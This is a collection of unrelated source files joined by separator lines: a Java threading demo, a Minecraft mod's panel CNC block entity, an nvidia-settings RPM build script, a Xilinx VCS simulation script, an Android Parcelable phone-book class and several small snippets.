for (int i = 0; i < numberofThreads; i++) {
threads[i].join();
}
} catch (InterruptedException e) {
System.out.println("some thread is not finished");
}
System.out.print("The result is ... ");
System.out.print("wait for it ... ");
System.out.println(count);
}
}
// Worker thread performing one unsynchronized increment of the shared
// counter (intentionally racy — see the note on FirstBlood.count).
class A extends Thread {
public void run() {
FirstBlood.count++;
}
}
|
<filename>src/main/java/malte0811/controlengineering/blockentity/panels/PanelCNCBlockEntity.java
package malte0811.controlengineering.blockentity.panels;
import blusunrize.immersiveengineering.api.utils.CapabilityReference;
import com.google.common.collect.ImmutableList;
import malte0811.controlengineering.blockentity.MultiblockBEType;
import malte0811.controlengineering.blockentity.base.CEBlockEntity;
import malte0811.controlengineering.blockentity.base.IExtraDropBE;
import malte0811.controlengineering.blockentity.bus.ParallelPort;
import malte0811.controlengineering.blockentity.tape.TapeDrive;
import malte0811.controlengineering.blocks.CEBlocks;
import malte0811.controlengineering.blocks.panels.PanelCNCBlock;
import malte0811.controlengineering.blocks.shapes.ListShapes;
import malte0811.controlengineering.blocks.shapes.SelectionShapeOwner;
import malte0811.controlengineering.blocks.shapes.SelectionShapes;
import malte0811.controlengineering.blocks.shapes.SingleShape;
import malte0811.controlengineering.bus.BusState;
import malte0811.controlengineering.bus.IBusInterface;
import malte0811.controlengineering.bus.MarkDirtyHandler;
import malte0811.controlengineering.client.render.utils.PiecewiseAffinePath;
import malte0811.controlengineering.controlpanels.PlacedComponent;
import malte0811.controlengineering.controlpanels.cnc.CNCInstructionParser;
import malte0811.controlengineering.items.PanelTopItem;
import malte0811.controlengineering.items.PunchedTapeItem;
import malte0811.controlengineering.util.*;
import malte0811.controlengineering.util.math.MatrixUtils;
import net.minecraft.Util;
import net.minecraft.core.BlockPos;
import net.minecraft.core.Direction;
import net.minecraft.nbt.CompoundTag;
import net.minecraft.world.InteractionResult;
import net.minecraft.world.item.ItemStack;
import net.minecraft.world.item.context.UseOnContext;
import net.minecraft.world.level.block.entity.BlockEntityType;
import net.minecraft.world.level.block.state.BlockState;
import net.minecraft.world.phys.AABB;
import net.minecraft.world.phys.Vec3;
import net.minecraft.world.phys.shapes.Shapes;
import net.minecraftforge.common.capabilities.Capability;
import net.minecraftforge.common.util.LazyOptional;
import net.minecraftforge.energy.CapabilityEnergy;
import net.minecraftforge.energy.EnergyStorage;
import net.minecraftforge.energy.IEnergyStorage;
import net.minecraftforge.items.CapabilityItemHandler;
import net.minecraftforge.items.IItemHandler;
import net.minecraftforge.registries.DeferredRegister;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.function.Consumer;
import static malte0811.controlengineering.util.ShapeUtils.createPixelRelative;
/**
 * Block entity for the Panel CNC multiblock: reads a punched tape describing a
 * control-panel layout, draws energy from an internal buffer, pulls component
 * items from neighboring inventories, and places them onto an inserted blank
 * panel. Errors and job results are reported over a parallel bus port.
 * NOTE(review): comments below describe only what is visible in this file;
 * claims about Forge/mod semantics are hedged where they cannot be confirmed.
 */
public class PanelCNCBlockEntity extends CEBlockEntity implements SelectionShapeOwner, IExtraDropBE, IBusInterface {
    // Energy drained from the buffer on every tick while a job is in process.
    private static final int ENERGY_CONSUMPTION = 40;
    // Machine state; only mutate through setState so changes are synced.
    private State state = State.EMPTY;
    // Tape reader; inserting/removing tape drives the state-machine transitions.
    private final TapeDrive tape = new TapeDrive(
            () -> setState(state.addTape()), () -> setState(state.removeTape()), () -> state.canTakeTape()
    );
    // Parsed CNC job, recomputed only when the tape bytes change. The tape
    // content is defensively copied (Arrays.copyOf) so later mutation of the
    // tape cannot invalidate the cached comparison key.
    private final CachedValue<byte[], CNCJob> currentJob = new CachedValue<>(
            tape::getNullableTapeContent,
            tape -> {
                if (tape != null) {
                    return CNCJob.createFor(CNCInstructionParser.parse(level, BitUtils.toString(tape)));
                } else {
                    return null;
                }
            },
            Arrays::equals,
            b -> b == null ? null : Arrays.copyOf(b, b.length)
    );
    // Ticks elapsed in the current job; advanced on both sides (see clientTick).
    private int currentTicksInJob;
    // Components already placed on the in-progress panel.
    private final List<PlacedComponent> currentPlacedComponents = new ArrayList<>();
    // Item handlers of the four horizontal neighbors, used to consume component
    // costs during a job.
    private final List<CapabilityReference<IItemHandler>> neighborInventories = Util.make(
            new ArrayList<>(),
            list -> {
                for (Direction d : DirectionUtils.BY_HORIZONTAL_INDEX) {
                    list.add(CapabilityReference.forNeighbor(this, CapabilityItemHandler.ITEM_HANDLER_CAPABILITY, d));
                }
            }
    );
    // Buffer sized for 20 ticks (one second) of consumption.
    private final EnergyStorage energy = new EnergyStorage(20 * ENERGY_CONSUMPTION);
    // Aggregates dirty-callbacks of connected buses (see addMarkDirtyCallback).
    private final MarkDirtyHandler markBusDirty = new MarkDirtyHandler();
    // Serial-over-parallel output used to report job errors/status on the bus.
    private final ParallelPort dataOutput = new ParallelPort();
    // Used and initialized by the renderer
    public CachedValue<CNCJob, PiecewiseAffinePath<Vec3>> headPath;
    // Selection shapes of the lower block half: panel slot (top face), tape
    // drive, and data-output connector, recomputed when the facing changes.
    private final CachedValue<Direction, SelectionShapes> bottomSelectionShapes = new CachedValue<>(
            () -> getBlockState().getValue(PanelCNCBlock.FACING),
            facing -> new ListShapes(
                    Shapes.block(),
                    MatrixUtils.inverseFacing(facing),
                    ImmutableList.of(
                            new SingleShape(createPixelRelative(1, 14, 1, 15, 16, 15), this::panelClick),
                            new SingleShape(createPixelRelative(2, 4, 14, 14, 12, 16), tape::click),
                            new SingleShape(
                                    createPixelRelative(4, 4, 0, 12, 12, 1),
                                    dataOutput.makeRemapInteraction(this)
                            )
                    ),
                    ctx -> InteractionResult.PASS
            )
    );
    // The upper block half has no interactive sub-shapes.
    private static final SelectionShapes topSelectionShapes = new SingleShape(
            PanelCNCBlock.UPPER_SHAPE, $ -> InteractionResult.PASS
    );

    public PanelCNCBlockEntity(BlockEntityType<?> type, BlockPos pos, BlockState state) {
        super(type, pos, state);
    }

    /**
     * Handles a click on the panel slot: take the finished/failed panel out,
     * or insert an empty panel top from the player's hand.
     */
    private InteractionResult panelClick(UseOnContext ctx) {
        if (level == null) {
            return InteractionResult.PASS;
        }
        if (state.canTakePanel()) {
            // Server side does the actual extraction; both sides report success.
            if (!level.isClientSide && ctx.getPlayer() != null) {
                ItemStack result = PanelTopItem.createWithComponents(currentPlacedComponents);
                ItemUtil.giveOrDrop(ctx.getPlayer(), result);
                currentPlacedComponents.clear();
                currentTicksInJob = 0;
                setState(state.removePanel());
            }
            return InteractionResult.SUCCESS;
        } else if (!state.hasPanel()) {
            ItemStack heldItem = ctx.getItemInHand();
            if (PanelTopItem.isEmptyPanelTop(heldItem)) {
                if (!level.isClientSide) {
                    setState(state.addPanel());
                    heldItem.shrink(1);
                }
                return InteractionResult.SUCCESS;
            }
        }
        return InteractionResult.FAIL;
    }

    // Client mirrors the tick counter while running so rendering stays smooth;
    // the authoritative value is synced from the server via NBT.
    public void clientTick() {
        if (state == State.RUNNING) {
            ++currentTicksInJob;
        }
    }

    /**
     * Server tick: pump the data output, then advance the job if one is in
     * process — consume energy, place the next component when its tick is
     * reached, and finish (DONE/FAILED) once the job's total ticks elapse.
     */
    public void tick() {
        if (dataOutput.tickTX()) {
            markBusDirty.run();
        }
        if (state.isInProcess()) {
            // Simulate first: without enough energy the machine stalls in
            // NO_ENERGY rather than partially consuming.
            if (energy.extractEnergy(ENERGY_CONSUMPTION, true) < ENERGY_CONSUMPTION) {
                setState(State.NO_ENERGY);
                return;
            }
            energy.extractEnergy(ENERGY_CONSUMPTION, false);
            setState(State.RUNNING);
            ++currentTicksInJob;
            int nextComponent = currentPlacedComponents.size();
            CNCJob job = currentJob.get();
            if (nextComponent < job.getTotalComponents()) {
                if (!level.isClientSide && currentTicksInJob >= job.tickPlacingComponent().getInt(nextComponent)) {
                    PlacedComponent componentToPlace = job.components().get(nextComponent);
                    var componentCost = componentToPlace.getComponent().getType().getCost(level);
                    if (!ItemUtil.tryConsumeItemsFrom(componentCost, neighborInventories)) {
                        // Report the failure on the bus and abort the job.
                        dataOutput.queueStringWithParity("Unable to consume items for component number " + nextComponent);
                        setState(State.FAILED);
                    } else {
                        currentPlacedComponents.add(componentToPlace);
                        BEUtil.markDirtyAndSync(this);
                    }
                }
            }
            if (currentTicksInJob >= job.totalTicks()) {
                if (job.error() != null) {
                    // Parse error embedded in the job: surface it, mark FAILED.
                    dataOutput.queueStringWithParity(job.error());
                    setState(State.FAILED);
                } else {
                    setState(State.DONE);
                }
            }
        }
    }

    @Override
    public SelectionShapes getShape() {
        // Upper half is inert; lower half exposes the interactive sub-shapes.
        if (getBlockState().getValue(PanelCNCBlock.UPPER)) {
            return topSelectionShapes;
        } else {
            return bottomSelectionShapes.get();
        }
    }

    /** @return the job parsed from the current tape, or null without a tape. */
    @Nullable
    public CNCJob getCurrentJob() {
        return currentJob.get();
    }

    public int getTapeLength() {
        return tape.getTapeLength();
    }

    public int getCurrentTicksInJob() {
        return currentTicksInJob;
    }

    public List<PlacedComponent> getCurrentPlacedComponents() {
        return currentPlacedComponents;
    }

    public State getState() {
        return state;
    }

    @Override
    public void saveAdditional(@Nonnull CompoundTag compound) {
        super.saveAdditional(compound);
        // Server-only persistence = synced subset + energy + pending output.
        writeSyncedData(compound);
        compound.put("energy", energy.serializeNBT());
        compound.put("dataOutput", dataOutput.toNBT());
    }

    @Override
    public void load(@Nonnull CompoundTag nbt) {
        super.load(nbt);
        readSyncedData(nbt);
        energy.deserializeNBT(nbt.get("energy"));
        dataOutput.readNBT(nbt.getCompound("dataOutput"));
    }

    // Client-synced subset: tape, job progress, state, placed components.
    @Override
    protected void readSyncedData(CompoundTag compound) {
        tape.loadNBT(compound.get("tape"));
        currentTicksInJob = compound.getInt("currentTick");
        state = State.VALUES[compound.getInt("state")];
        currentPlacedComponents.clear();
        var components = PlacedComponent.LIST_CODEC.fromNBT(compound.get("components"));
        if (components != null) {
            currentPlacedComponents.addAll(components);
        }
    }

    @Override
    protected void writeSyncedData(CompoundTag in) {
        in.put("tape", tape.toNBT());
        in.putInt("currentTick", currentTicksInJob);
        in.putInt("state", state.ordinal());
        in.put("components", PlacedComponent.LIST_CODEC.toNBT(currentPlacedComponents));
    }

    // Drops not covered by the block item itself: the tape and the panel.
    @Override
    public void getExtraDrops(Consumer<ItemStack> dropper) {
        if (tape.hasTape()) {
            dropper.accept(PunchedTapeItem.withBytes(tape.getTapeContent()));
        }
        if (state.hasPanel()) {
            dropper.accept(PanelTopItem.createWithComponents(currentPlacedComponents));
        }
    }

    // Render box spans the full 1x2x2 multiblock, not just this block's cube.
    private final CachedValue<BlockPos, AABB> renderBB = new CachedValue<>(
            () -> worldPosition, pos -> new AABB(
            pos.getX(), pos.getY(), pos.getZ(),
            pos.getX() + 1, pos.getY() + 2, pos.getZ() + 2
    ));

    @Override
    public AABB getRenderBoundingBox() {
        return renderBB.get();
    }

    public static MultiblockBEType<PanelCNCBlockEntity, ?> register(DeferredRegister<BlockEntityType<?>> register) {
        return MultiblockBEType.makeType(
                register, "panel_cnc", PanelCNCBlockEntity::new, Dummy::new, CEBlocks.PANEL_CNC, PanelCNCBlock::isMaster
        );
    }

    // Single choke point for state changes: only syncs when the state differs.
    private void setState(State state) {
        if (state != this.state) {
            this.state = state;
            BEUtil.markDirtyAndSync(this);
        }
    }

    @Override
    public void onBusUpdated(BusState totalState, BusState otherState) {
        dataOutput.onBusStateChange(otherState);
        setChanged();
    }

    @Override
    public BusState getEmittedState() {
        return dataOutput.getOutputState();
    }

    @Override
    public boolean canConnect(Direction fromSide) {
        // Bus connects only on the front face.
        return fromSide == getBlockState().getValue(PanelCNCBlock.FACING);
    }

    @Override
    public void addMarkDirtyCallback(Clearable<Runnable> markDirty) {
        this.markBusDirty.addCallback(markDirty);
    }

    @Override
    public void setRemoved() {
        super.setRemoved();
        this.markBusDirty.run();
    }

    /**
     * Upper ("dummy") half of the multiblock. It only forwards energy
     * capability requests from its top face to the master entity below.
     */
    private static class Dummy extends CEBlockEntity {
        // Lazily resolved reference to the master's energy buffer.
        private LazyOptional<IEnergyStorage> energyRef = null;

        public Dummy(BlockEntityType<?> type, BlockPos pos, BlockState state) {
            super(type, pos, state);
        }

        @Nonnull
        @Override
        public <T> LazyOptional<T> getCapability(@Nonnull Capability<T> cap, @Nullable Direction side) {
            if (cap == CapabilityEnergy.ENERGY && CapabilityUtils.isNullOr(Direction.UP, side)) {
                if (energyRef == null) {
                    if (level.getBlockEntity(worldPosition.below()) instanceof PanelCNCBlockEntity paneCNC) {
                        energyRef = CapabilityUtils.constantOptional(paneCNC.energy);
                    } else {
                        // Master missing below: report no capability, but keep
                        // energyRef null so a later attempt can resolve it.
                        return LazyOptional.empty();
                    }
                }
                return energyRef.cast();
            }
            return super.getCapability(cap, side);
        }

        @Override
        public void invalidateCaps() {
            super.invalidateCaps();
            if (energyRef != null) {
                energyRef.invalidate();
            }
        }
    }

    /**
     * Machine state. Valid transitions are encoded in addTape/removeTape and
     * addPanel/removePanel; anything else throws. Note that adding the second
     * ingredient (tape onto HAS_PANEL, or panel onto HAS_TAPE) immediately
     * starts the job (RUNNING).
     */
    public enum State {
        EMPTY,
        HAS_TAPE,
        HAS_PANEL,
        RUNNING,
        NO_ENERGY,
        FAILED,
        DONE;

        // Cached to avoid re-allocating on every ordinal lookup in load().
        public static final State[] VALUES = values();

        public boolean canTakePanel() {
            return hasPanel() && !isInProcess();
        }

        public boolean hasPanel() {
            return this == HAS_PANEL || this == RUNNING || this == NO_ENERGY || this == FAILED || this == DONE;
        }

        public boolean isInProcess() {
            return this == RUNNING || this == NO_ENERGY;
        }

        public State removePanel() {
            return switch (this) {
                case HAS_PANEL -> EMPTY;
                // Finished/failed jobs keep their tape when the panel leaves.
                case FAILED, DONE -> HAS_TAPE;
                default -> throw new RuntimeException(name());
            };
        }

        public State addPanel() {
            return switch (this) {
                case EMPTY -> HAS_PANEL;
                case HAS_TAPE -> RUNNING;
                default -> throw new RuntimeException(name());
            };
        }

        public State addTape() {
            return switch (this) {
                case EMPTY -> HAS_TAPE;
                case HAS_PANEL -> RUNNING;
                default -> throw new RuntimeException(name());
            };
        }

        public boolean canTakeTape() {
            return hasTape() && !isInProcess();
        }

        public State removeTape() {
            return switch (this) {
                case HAS_TAPE -> EMPTY;
                case FAILED, DONE -> HAS_PANEL;
                default -> throw new RuntimeException(name());
            };
        }

        public boolean hasTape() {
            return this == HAS_TAPE || this == RUNNING || this == NO_ENERGY || this == FAILED || this == DONE;
        }
    }
}
|
#!/usr/bin/env bash
# Build nvidia-settings RPM packages from the upstream tarball.
# Usage: <script> <runfile> [distro]
runfile="$1"
distro="$2"
# rpmbuild working tree and fixed package epoch.
topdir="$HOME/nvidia-settings"
epoch="3"
# Destination for finished RPMs; overridable via the OUTPUT env var.
[[ -n $OUTPUT ]] ||
OUTPUT="$HOME/rpm-nvidia"
# Default the distro to the current git branch name; "main" maps to rhel8.
[[ -n $distro ]] ||
distro=$(git rev-parse --abbrev-ref HEAD 2>/dev/null)
[[ $distro == "main" ]] && distro="rhel8"
# Derive arch/version from the runfile name, e.g.
# NVIDIA-Linux-x86_64-470.57.02.run -> arch=x86_64, version=470.57.02.
drvname=$(basename "$runfile")
arch=$(echo "$drvname" | awk -F "-" '{print $3}')
version=$(echo "$drvname" | sed -e "s|NVIDIA\-Linux\-${arch}\-||" -e 's|\.run$||' -e 's|\-grid$||' -e 's|\.tar\..*||' -e 's|nvidia\-settings\-||')
drvbranch=$(echo "$version" | awk -F "." '{print $1}')
tarball="nvidia-settings-${version}"
# err: print a message and abort. kmd: echo the command, then eval it and abort
# on failure. dep: require a binary on PATH. lib: require a shared library in
# the ldconfig cache.
err() { echo; echo "ERROR: $*"; exit 1; }
kmd() { echo; echo ">>> $*" | fold -s; eval "$*" || err "at line \`$*\`"; }
dep() { type -p "$1" >/dev/null || err "missing dependency $1"; }
# NOTE(review): the sed maps "-devel" to ".sol" — ".so" was probably intended.
# lib() is never called in this script, so the typo is latent; confirm before use.
lib() { local sofile=$(echo "$1" | sed 's|\-devel|\.sol|'); ldconfig -p | grep -q "$sofile" || err "missing library $1"; }
# Fetch the nvidia-settings source tarball from the NVIDIA download server,
# unless it is already present in the working directory.
fetch_input() {
    inputfile="${tarball}.tar.bz2"
    # Nothing to do when the tarball already exists.
    [[ -f "$inputfile" ]] && return
    dep wget
    kmd wget "https://download.nvidia.com/XFree86/nvidia-settings/${tarball}.tar.bz2" -O "$inputfile"
}
# Build the nvidia-settings RPM for dnf-based distros (rhel8 and newer):
# stage sources/spec into a fresh rpmbuild tree, then run rpmbuild -bb.
build_dnf_rpm()
{
# Create the rpmbuild directory layout and copy build inputs into it.
mkdir -p "$topdir"
(cd "$topdir" && mkdir -p BUILD BUILDROOT RPMS SRPMS SOURCES SPECS)
cp -v -- *.desktop "$topdir/SOURCES/"
cp -v -- *.patch "$topdir/SOURCES/"
cp -v -- *.xml "$topdir/SOURCES/"
cp -v -- *settings*.tar* "$topdir/SOURCES/"
cp -v -- *.spec "$topdir/SPECS/"
cd "$topdir" || err "Unable to cd into $topdir"
# Binary-only build (-bb); version/epoch are injected as spec macros.
kmd rpmbuild \
--define "'%_topdir $(pwd)'" \
--define "'debug_package %{nil}'" \
--define "'version $version'" \
--define "'epoch $epoch'" \
-v -bb SPECS/nvidia-settings.spec
cd - || err "Unable to cd into $OLDPWD"
}
# Build the nvidia-settings RPM for yum-based distros (rhel7): stage sources
# and spec into a fresh rpmbuild tree, detect the tarball compression, and run
# rpmbuild -bb with the legacy flavor/dkms macros.
build_yum_rpm()
{
mkdir -p "$topdir"
(cd "$topdir" && mkdir -p BUILD BUILDROOT RPMS SRPMS SOURCES SPECS)
cp -v -- *.desktop "$topdir/SOURCES/"
cp -v -- *.patch "$topdir/SOURCES/"
cp -v -- *.xml "$topdir/SOURCES/"
cp -v -- *settings*.tar* "$topdir/SOURCES/"
cp -v -- *.spec "$topdir/SPECS/"
# Determine the tarball compression. The original fell through silently when
# neither archive existed, passing an empty %extension to rpmbuild; abort
# with a clear error instead.
if [[ -f "nvidia-settings-${version}.tar.gz" ]]; then
extension="gz"
elif [[ -f "nvidia-settings-${version}.tar.bz2" ]]; then
extension="bz2"
else
err "nvidia-settings-${version} tarball (.tar.gz or .tar.bz2) not found"
fi
#
# NOTE: this package is not branched, therefore regardless of flavor, the highest version installed by default.
#
# To install a specific version:
# list+=("nvidia-libXNVCtrl-$version")
# list+=("nvidia-libXNVCtrl-devel-$version")
# list+=("nvidia-settings-$version")
# sudo yum install ${list[@]}
flavor="latest-dkms"
is_latest=1
is_dkms=1
cd "$topdir" || err "Unable to cd into $topdir"
echo -e "\n:: flavor $flavor [$is_latest] [$is_dkms]"
# Binary-only build (-bb); version/flavor/epoch are injected as spec macros.
kmd rpmbuild \
--define "'%_topdir $(pwd)'" \
--define "'debug_package %{nil}'" \
--define "'version $version'" \
--define "'driver_branch $flavor'" \
--define "'is_dkms $is_dkms'" \
--define "'is_latest $is_latest'" \
--define "'extension $extension'" \
--define "'epoch $epoch'" \
-v -bb SPECS/nvidia-settings.spec
cd - || err "Unable to cd into $OLDPWD"
}
# Dispatch to the right RPM build flavor for the selected distro:
# rhel7 uses the legacy yum layout, everything else the dnf layout.
build_wrapper()
{
    echo ":: Building $distro packages"
    case "$distro" in
        rhel7) build_yum_rpm ;;
        *)     build_dnf_rpm ;;
    esac
}
# Download tarball
# Skip the fetch when either compression variant is already on disk.
if [[ -f ${tarball}.tar.bz2 ]]; then
echo "[SKIP] fetch_input($version)"
elif [[ -f ${tarball}.tar.gz ]]; then
echo "[SKIP] fetch_input($version)"
else
echo "==> fetch_input($version)"
fetch_input
fi
# Sanity check
[[ -n $version ]] || err "version could not be determined"
# Build RPMs
# Rebuild only when the RPMS tree is missing, empty, or lacks artifacts
# for this version.
empty=$(find "$topdir/RPMS" -maxdepth 0 -type d -empty 2>/dev/null)
found=$(find "$topdir/RPMS" -mindepth 2 -maxdepth 2 -type f -name "*${version}*" 2>/dev/null)
if [[ ! -d "$topdir/RPMS" ]] || [[ $empty ]] || [[ ! $found ]]; then
echo "==> build_rpm(${version})"
# Verify build-time dependencies before starting.
dep m4
dep gcc
dep rpmbuild
dep update-desktop-database
build_wrapper
else
echo "[SKIP] build_rpm(${version})"
fi
echo "---"
# Copy every RPM built for this version into the output directory.
found=$(find "$topdir/RPMS" -mindepth 2 -maxdepth 2 -type f -name "*${version}*" 2>/dev/null)
for rpm in $found; do
echo "-> $(basename "$rpm")"
mkdir -p "$OUTPUT"
rsync -a "$rpm" "$OUTPUT"
done
|
# Batch running of Event Processing Agents (EPA) with test files
# By mikko.rinne@aalto.fi 20.1.2016
# Each individual EPA and the combination of all EPAs is executed on 1000 events
# Modify as needed to run other event files

# Print a banner (with echo -e escape expansion), then run the given command.
run_case() {
    local banner="$1"
    shift
    echo -e "$banner"
    "$@"
}

run_case "\n\n\nEPA1 (Stateless filter)" ./EPArun.sh EPA1 1000events
run_case "\n\n\nEPA2 (Stateful filter)" ./EPArun.sh EPA2 1000events
run_case "\n\n\nEPA3 (Enrich) local" ./EPArun.sh EPA3_local 1000events
run_case "\n\n\nEPA4 (Project) - using input from EPA3 local" ./EPArun.sh EPA4 EPA3_1000events
run_case "\n\n\nEPA5 (Split)" ./EPArun.sh EPA5 1000events
run_case "\n\n\nEPA6 (Aggregate)" ./EPArun.sh EPA6 1000events
run_case "\n\n\nEPA7 (Compose) - using input from EPA5, always cleanup-rule" ./EPA7run.sh EPA5_1000events
run_case "\n\n\nEPA8 (Pattern detection) - always remove-policy" ./EPArun.sh EPA8 1000events
run_case "\n\n\nEPA-All (Combination of all agents) - always remove-policy" ./EPArun.sh EPA-All 1000events
|
a = [[1, 2], [3, 4], [5, 6]]

# Returns an array with one entry per row of arr: the sum of that row's elements.
def row_sum(arr)
  arr.map { |row| row.inject(0) { |acc, x| acc + x } }
end

p row_sum(a)
<reponame>Justice-love/tiger
/**
 * Created: 8:11:12 PM
 *
 * @author Eddy
 */
package tiger.test.superinject;

import javax.inject.Named;

/**
 * Named test bean ("phoenix") exercising injection inherited from a superclass.
 * NOTE(review): the {@code cow} field is declared on {@code Animal}, not here —
 * presumably injected by the container before {@link #phoenix()} runs; confirm
 * against the superclass.
 *
 * @author Eddy
 */
@Named("phoenix")
public class Phoenix extends Animal {
    // Delegates to the superclass-provided cow instance.
    public void phoenix() {
        cow.cow();
    }
}
|
#!/bin/bash
# Apply installed patch scripts in order: the metadata-service bugfix first,
# then the file-edit patch. Both are expected under /usr/local/bin.
# NOTE(review): failures are not checked — a failing first script does not
# stop the second; confirm whether that is intended.
/usr/local/bin/metadata_svc_bugfix.sh
/usr/local/bin/file_edit_patch.sh
|
package io.opensphere.controlpanels.layers.base;

/**
 * Interface to an object which will ask the user yes/no questions and return
 * the user's response.
 */
@FunctionalInterface
public interface UserConfirmer
{
    /**
     * Asks the user the specified question.
     *
     * @param question The question to ask the user.
     * @param title The title of the question.
     * @return True if the user responded yes, false if the user responded no.
     */
    boolean askUser(String question, String title);
}
|
#!/bin/sh
# file: simulate_vcs.sh
#
# (c) Copyright 2008 - 2011 Xilinx, Inc. All rights reserved.
#
# This file contains confidential and proprietary information
# of Xilinx, Inc. and is protected under U.S. and
# international copyright and other intellectual property
# laws.
#
# DISCLAIMER
# This disclaimer is not a license and does not grant any
# rights to the materials distributed herewith. Except as
# otherwise provided in a valid license issued to you by
# Xilinx, and to the maximum extent permitted by applicable
# law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
# WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
# AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
# BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
# INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
# (2) Xilinx shall not be liable (whether in contract or tort,
# including negligence, or under any other theory of
# liability) for any loss or damage of any kind or nature
# related to, arising under or in connection with these
# materials, including for any direct, or any indirect,
# special, incidental, or consequential loss or damage
# (including loss of data, profits, goodwill, or any type of
# loss or damage suffered as a result of any action brought
# by a third party) even if such damage or loss was
# reasonably foreseeable or Xilinx had been advised of the
# possibility of the same.
#
# CRITICAL APPLICATIONS
# Xilinx products are not designed or intended to be fail-
# safe, or for use in any application requiring fail-safe
# performance, such as life-support or safety devices or
# systems, Class III medical devices, nuclear facilities,
# applications related to the deployment of airbags, or any
# other applications that could lead to death, personal
# injury, or severe property or environmental damage
# (individually and collectively, "Critical
# Applications"). Customer assumes the sole risk and
# liability of any use of Xilinx products in Critical
# Applications, subject only to applicable laws and
# regulations governing limitations on product liability.
#
# THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
# PART OF THIS FILE AT ALL TIMES.
#
# remove old files
rm -rf simv* csrc DVEfiles AN.DB
# compile all of the files
# Note that -sverilog is not strictly required- You can
# remove the -sverilog if you change the type of the
# localparam for the periods in the testbench file to
# [63:0] from time
# Analyze the core, example design, and testbench VHDL with Synopsys vhdlan.
vhdlan -xlrm ../../../clkGen.vhd \
../../example_design/clkGen_exdes.vhd \
../clkGen_tb.vhd
# prepare the simulation
# (elaborate the testbench top into the simv executable)
vcs +vcs+lic+wait -xlrm -debug clkGen_tb
# run the simulation
# (ucli_commands.key drives the interactive UCLI session)
./simv -xlrm -ucli -i ucli_commands.key
# launch the viewer
#dve -vpd vcdplus.vpd -session vcs_session.tcl
|
package com.roadrover.btservice.bluetooth;
import android.os.Parcel;
import android.os.Parcelable;
import android.text.TextUtils;
/**
 * Parcelable data holder for a Bluetooth phone book entry / call record,
 * passed between processes via AIDL.
 */
public class BluetoothVCardBook implements Parcelable {
    /** Character encoding type of the record. */
    public String codingType;
    /** Contact name. */
    public String name;
    /** Record type, e.g. dialed or missed call. */
    public String type;
    /** Phone number. */
    public String phoneNumber;
    /** Call time of a call record, formatted like 20170109T211652 (2017/01/09 21:16:52). */
    public String callTime;

    protected BluetoothVCardBook(Parcel in) {
        readFromParcel(in);
    }

    /**
     * Factory for an entry populated from plain field values.
     *
     * @param codingType character encoding type
     * @param name contact name
     * @param type record type, e.g. dialed or missed
     * @param phoneNumber phone number
     * @param callTime call time of the record
     * @return a new populated instance
     */
    public static BluetoothVCardBook createVCardBook(String codingType, String name, String type, String phoneNumber, String callTime) {
        // Construct directly rather than routing through
        // CREATOR.createFromParcel(null); readFromParcel(null) is a no-op
        // either way, so behavior is unchanged but the intent is clearer.
        BluetoothVCardBook book = new BluetoothVCardBook(null);
        book.codingType = codingType;
        book.name = name;
        book.type = type;
        book.phoneNumber = phoneNumber;
        book.callTime = callTime;
        return book;
    }

    public static final Creator<BluetoothVCardBook> CREATOR = new Creator<BluetoothVCardBook>() {
        @Override
        public BluetoothVCardBook createFromParcel(Parcel in) {
            return new BluetoothVCardBook(in);
        }

        @Override
        public BluetoothVCardBook[] newArray(int size) {
            return new BluetoothVCardBook[size];
        }
    };

    @Override
    public String toString() {
        return "coding:" + codingType + " name:" + name +
                " type:" + type + " number:" + phoneNumber +
                " time:" + callTime;
    }

    @Override
    public int describeContents() {
        return 0;
    }

    // Field order here must match readFromParcel below.
    @Override
    public void writeToParcel(Parcel parcel, int i) {
        parcel.writeString(codingType);
        parcel.writeString(name);
        parcel.writeString(type);
        parcel.writeString(phoneNumber);
        parcel.writeString(callTime);
    }

    public void readFromParcel(Parcel source) {
        // A null source (factory path above) leaves all fields unset.
        if (null != source) {
            codingType = source.readString();
            name = source.readString();
            type = source.readString();
            phoneNumber = source.readString();
            callTime = source.readString();
        }
    }

    /**
     * Two records are the same entry when name, phone number, and call time
     * all match (null-safely, via TextUtils.equals).
     *
     * @param o the object to compare against
     * @return true if the records are considered identical
     */
    @Override
    public boolean equals(Object o) {
        if (o == this) {
            return true;
        }
        // instanceof already rejects null, so the original's extra null
        // check was redundant.
        if (!(o instanceof BluetoothVCardBook)) {
            return false;
        }
        BluetoothVCardBook other = (BluetoothVCardBook) o;
        return TextUtils.equals(name, other.name)
                && TextUtils.equals(phoneNumber, other.phoneNumber)
                && TextUtils.equals(callTime, other.callTime);
    }

    @Override
    public int hashCode() {
        // Only the name participates: equal records (per equals) have equal
        // names, so this stays consistent with equals() and null-safe.
        if (name != null) {
            return name.hashCode();
        }
        return 0;
    }
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.